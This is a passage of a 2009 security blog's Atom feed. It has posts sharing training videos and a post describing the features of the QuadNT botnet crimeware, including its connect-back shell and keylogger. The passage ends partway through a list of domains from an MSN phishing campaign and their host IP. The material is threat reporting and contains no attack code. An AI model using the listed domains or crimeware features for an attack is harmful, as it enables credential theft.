/&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/s3-code-tech1.htm"&gt;Spartan-3 FPGA HDL Coding Techniques - Part 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/s3-code-tech2.htm"&gt;Spartan-3 FPGA HDL Coding Techniques - Part 2&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/v5-code-tech1.htm"&gt;Virtex®-5 FPGA HDL Coding Techniques - Part 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/v5-code-tech2.htm"&gt;Virtex®-5 FPGA HDL Coding Techniques - Part 2&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/v6s6-hdl-code-tech1.htm"&gt;Virtex®-6 &amp; Spartan®-6 FPGA HDL Coding Techniques - Part 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/v6s6-hdl-code-tech2.htm"&gt;Virtex®-6 &amp; Spartan®-6 FPGA HDL Coding Techniques - Part 2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Thanks to Xilinx for sharing such great resources to the common world. This is something that is rare to find in FREE training videos.&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-8882145265675436219?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/8882145265675436219/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=8882145265675436219' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8882145265675436219'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8882145265675436219'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/xilinx-recorded-e-learning-course.html' title='XILINX: Recorded E-Learning Course Listing'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gJDtaXmerr4/SvdXMgwxlGI/AAAAAAAAAXs/utdXFS9Dvhk/s72-c/FPGA+and+CPLD+Solutions+from+Xilinx,+Inc._1257723647506.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3022143571647120697</id><published>2009-11-07T18:28:00.004-11:00</published><updated>2009-11-07T18:51:09.050-11:00</updated><title type='text'>Youtube videos on Windows Hang and Crash Dump Analysis</title><content type='html'>Found these Youtube videos on Windows Hang and Crash Dump Analysis, and thought of sharing with you guys. So here it is[NOTE: To view the same directly on Youtube, click on the link directly above the video]:&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=JSeNWvjhBfg"&gt;Windows Hang and Crash Dump Analysis 1/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/JSeNWvjhBfg&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/JSeNWvjhBfg&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=m5KpJxzYgLg"&gt;Windows Hang and Crash Dump Analysis 2/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/m5KpJxzYgLg&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/m5KpJxzYgLg&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ZbOEgKt4KD0"&gt;Windows Hang and Crash Dump Analysis 3/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ZbOEgKt4KD0&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ZbOEgKt4KD0&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=0hfYZgMEy4I"&gt;Windows Hang and Crash Dump Analysis 4/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/0hfYZgMEy4I&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/0hfYZgMEy4I&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=rdkGPHxkolE"&gt;Windows Hang and Crash Dump Analysis 5/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/rdkGPHxkolE&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/rdkGPHxkolE&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=lpC2zOdl-Hs"&gt;Windows Hang and Crash Dump Analysis 6/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/lpC2zOdl-Hs&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/lpC2zOdl-Hs&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Zx9HPvd7Eb8"&gt;Windows Hang and Crash Dump Analysis 7/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Zx9HPvd7Eb8&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Zx9HPvd7Eb8&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=YOZNLTCyY40"&gt;Windows Hang and Crash Dump Analysis 8/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/YOZNLTCyY40&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/YOZNLTCyY40&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Ry9fZWHwU_c"&gt;Windows Hang and Crash Dump Analysis 9/9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Ry9fZWHwU_c&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Ry9fZWHwU_c&amp;hl=en&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;&lt;br /&gt;I am not sure if this was helpful to everyone reading the blog. But I am darn sure that some of them are finding all the video postings helpful. Although, we aren't the creators of the videos, I am trying to find all the free and useful videos from the openly available resources we have to share with our viewers. If you are trying to find something, but unable to get the resource kindly send us an email to contact.fingers[at]gmail.com.&lt;br /&gt;&lt;br /&gt;Thank you for your time.&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3022143571647120697?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/3022143571647120697/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=3022143571647120697' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3022143571647120697'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3022143571647120697'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/youtube-videos-on-windows-hang-and.html' title='Youtube videos on Windows Hang and Crash Dump Analysis'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-7996620720997327620</id><published>2009-11-05T01:56:00.001-11:00</published><updated>2009-11-05T01:56:00.377-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>QuadNT System. Zombies Management System I (Windows)</title><content type='html'>From the hand of the author of the control systems and management of &lt;span style="font-weight: bold;"&gt;botnets Open Source&lt;/span&gt; (&lt;span style="font-style: italic;"&gt;cross&lt;/span&gt;), a couple of months ago saw the light of another of his ambitious projects designed to control and manage botnets called &lt;span style="font-weight: bold;"&gt;Quad&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;In this case, this is the version developed for the windows platform called &lt;span style="font-weight: bold;"&gt;QuadNT Remote Administrator&lt;/span&gt;, but there is also a version for operating systems based on *NIX platforms. As with his previous projects, this is primarily characterized by crimeware be developed in Perl. One aspect common to all these applications.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Su41taIaQzI/AAAAAAAAB6Q/sX72S4-rttU/s1600-h/mipistus-quadnt_inst.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 239px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Su41taIaQzI/AAAAAAAAB6Q/sX72S4-rttU/s400/mipistus-quadnt_inst.png" alt="" id="BLOGGER_PHOTO_ID_5399312057488786226" border="0" /&gt;&lt;/a&gt;Unlike previous applications submitted by its developer, QuadNT Remote Administrator isn't free, ie has a free version with significant limitations and a private full version. However, unfortunately we can not know, maybe for the moment, the real cost of this &lt;span style="font-weight: bold;"&gt;crimeware&lt;/span&gt;, for reasons I will discuss shortly.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Su42loJFLZI/AAAAAAAAB6Y/Wqg1IUaeCy0/s1600-h/mipistus-quadnt-bot-3.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 171px; height: 99px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Su42loJFLZI/AAAAAAAAB6Y/Wqg1IUaeCy0/s200/mipistus-quadnt-bot-3.png" alt="" id="BLOGGER_PHOTO_ID_5399313023322369426" border="0" /&gt;&lt;/a&gt;Among its features are highlighted the possibility of: &lt;br /&gt;&lt;ul&gt;&lt;li style="font-style: italic;"&gt;Connect Back Shell&lt;/li&gt;&lt;li style="font-style: italic;"&gt;Trash Flood &lt;/li&gt;&lt;li style="font-style: italic;"&gt;Mouse Logger &lt;/li&gt;&lt;li style="font-style: italic;"&gt;Keylogger &lt;/li&gt;&lt;li style="font-style: italic;"&gt;Proxy server &lt;/li&gt;&lt;li style="font-style: italic;"&gt;Encrypted Remote Terminal Emulator &lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;Web Control Panel HTTP  &lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt; As I said the same creator, remote management system for the control of botnets is based on three fundamental aspects: &lt;br /&gt;&lt;ul&gt;&lt;li style="font-style: italic;"&gt;A client-side console&lt;/li&gt;&lt;li style="font-style: italic;"&gt;A server-side Gateway &lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;Automation of network botnet client that is in itself  &lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt; This first version focuses its efforts QuadNT working in user mode (Ring3). However, cross, its author promises a second version but working at low level, just at the kernel level or what is the same, ring0.&lt;br /&gt;&lt;br /&gt;Although previous projects are free, and although this same version will also offer free but limited version, still not in good acceptance in the underground world that makes the business of crimeware.&lt;br /&gt;&lt;br /&gt;However, this does not mean that constitute threats, indeed are potential alternatives that show the development of applications for handling botnets can be addressed in programming languages not commonly used in the field of zombie networks.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/hybrid-botnet-control-system-desarrollo.html"&gt;Hybrid Botnet Control System. Desarrollo de http bot en perl&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/desarrollo-de-crimeware-open-source.html"&gt;Desarrollo de crimeware Open Source para (...) administrar botnets&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/triad-botnet-iii-administracion-remota.html"&gt;TRiAD Botnet III. Administración remota de zombis multi...&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/triad-botnet-ii-administracion-remota.html"&gt;TRiAD Botnet II. Administración remota de zombis multi...&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/triad-botnet-administracion-remota-de.html"&gt;TRiAD Botnet. Administración remota de zombis en Linux&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-7996620720997327620?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/7996620720997327620/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=7996620720997327620' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7996620720997327620'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7996620720997327620'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/quadnt-system-zombies-management-system.html' title='QuadNT System. Zombies Management System I (Windows)'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Ppq0fEGkHo4/Su41taIaQzI/AAAAAAAAB6Q/sX72S4-rttU/s72-c/mipistus-quadnt_inst.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-272736262339107336</id><published>2009-11-04T16:52:00.003-11:00</published><updated>2009-11-04T17:07:53.485-11:00</updated><title type='text'>PHP Academy: PHP Basic Tutorials</title><content type='html'>When I was searching for PHP tutorials, I found the PHP Academy videos on PHP Basics. I thought that I should share it with you guys, since it would definitely help anyone who is looking for basic tuts to enter into PHP.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=IEJB7DkP7A8"&gt;PHP Basics: Install a Webserver with PHP and MySQL (Windows)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=NwqWJ0REZpE"&gt;PHP Basics: Echo Function&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ykutr20WDIQ"&gt;PHP Basics: Variables&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=aw_puAXiq-A"&gt;PHP Basics: IF statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ABymQWowfRU"&gt;PHP Basics: Arithmetic Operators&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ixRPZz4rxPg"&gt;PHP Basics: Comparison Operators&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ALPg0gZVkEI"&gt;PHP Basics: Logical Operators&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=h7QJqfd2ujI"&gt;PHP Basics: Switch&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=lITnQf7fz18"&gt;PHP Basics: Arrays&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=zd_r8X9Ppgw"&gt;PHP Basics: Multi-dimentional Arrays&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=tIE8gD1XIc0"&gt;PHP Basics: Loops - While statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=dosXYWYvMCk"&gt;PHP Basics: Loops - Do While statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=wQ3rKq9HuBw"&gt;PHP Basics: Loops - For statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=rZKQleHFvWo"&gt;PHP Basics: Loops - Foreach statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=mlzoS_7Ae18"&gt;PHP Basics: Basic function&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=FrKThjE2MJs"&gt;PHP Basics: Advanced function&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=d2BQnTFvevw"&gt;PHP Basics: GET variable&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=-CNLfCSnoGc"&gt;PHP Basics: POST variable&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=40mkmTKaFWo"&gt;PHP Basics: Common Errors (Part 1)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=q5opW7ZW198"&gt;PHP Basics: Common Errors (Part 2)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=sTNGSN_2wFY"&gt;PHP Basics: Common Errors (Part 3)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=N-T9Oz4RSAM"&gt;PHP Basics: Embedding PHP inside HTML&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;End of basic tuts to PHP. Thanks to PHP Academy for their efforts.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-272736262339107336?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/272736262339107336/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=272736262339107336' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/272736262339107336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/272736262339107336'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/php-academy-php-basic-tutorials.html' title='PHP Academy: PHP Basic Tutorials'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-2372702916365975182</id><published>2009-11-04T01:01:00.002-11:00</published><updated>2009-11-04T01:05:47.552-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='phishing'/><title type='text'>Phishing campaign targeted to users of MS</title><content type='html'>Since they started to become popular websites that promise to provide contact information locked in the instant messaging client from Microsoft, the campaigns aimed at stealing users' private information, are in constant insistence.&lt;br /&gt;&lt;br /&gt;The truth is that those who rely on this sort of cheating, they are victims no more or no less than a simple social engineering maneuver that in many cases, has a relatively unpalatable effectiveness and intended to carry out phishing attacks.&lt;br /&gt;&lt;br /&gt;This situation makes complete evidence levels (im) maturity that still exists in prevention and the need to raise awareness about the true scope and safety implications of the concepts of confidentiality and privacy.&lt;br /&gt;&lt;br /&gt;In this sense, a new phishing campaign is seeking to capture the attention of users who use popular instant messaging client from Microsoft, MSN. That is, almost 90% of people.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Su8QP17CH2I/AAAAAAAAB6g/H0B_-tmqzSY/s1600-h/mipistus-block_checker.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Su8QP17CH2I/AAAAAAAAB6g/H0B_-tmqzSY/s400/mipistus-block_checker.png" alt="" id="BLOGGER_PHOTO_ID_5399552342599278434" border="0" /&gt;&lt;/a&gt;Behind a hedge under the slogan "&lt;span style="font-style: italic;"&gt;Verify who blocked you on their msn contact lis&lt;/span&gt;t", a campaign that lies strategically and with patience is getting usernames and their passwords for all those interested in finding out who of your contacts have blocked ... I still don't understand it :(&lt;br /&gt;&lt;br /&gt;From a technical standpoint, under the IP address &lt;span style="font-weight: bold;"&gt;121.54.174.85 &lt;/span&gt;(Hong Kong Hong Kong Sun Network Limited) are housed a significant number of domains that redirect to the same fraudulent. These domains are:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;ahem-they-blocked-me.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;cindrella-blocked-me.com&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;damnn-they-blocked-me.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;did-they-block-you.com&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;face-blocked-truth.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;find-reason-of-being-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;finding-who-blocks.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;friends-block-buddies.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;grab-block-status.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Su8SkRgfWQI/AAAAAAAAB6w/Yd4xs6mFebs/s1600-h/msn-block.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 64px; height: 400px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Su8SkRgfWQI/AAAAAAAAB6w/Yd4xs6mFebs/s400/msn-block.png" alt="" id="BLOGGER_PHOTO_ID_5399554892624779522" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;grab-my-block-status.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;have-they-blocked-you.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;heroes-never-block.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;how-come-they-block-me.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;im-fedup-of-being-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;im-sad-im-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;ima-checking-block-status.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;jesus-he-blocked-us.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;kephsa.why-do-they-block.com&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;lame-friends-block-you.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;leme-check-block-status.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;mean-friends-block.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;mjzfx0.why-do-they-block.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;notice-they-blocked-u.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;oh-i-was-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;omg-they-blocked-me.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;phew-they-blocked-me.com&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;phewww-seems-i-am-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;puff-im-blocked.com&lt;/span&gt; 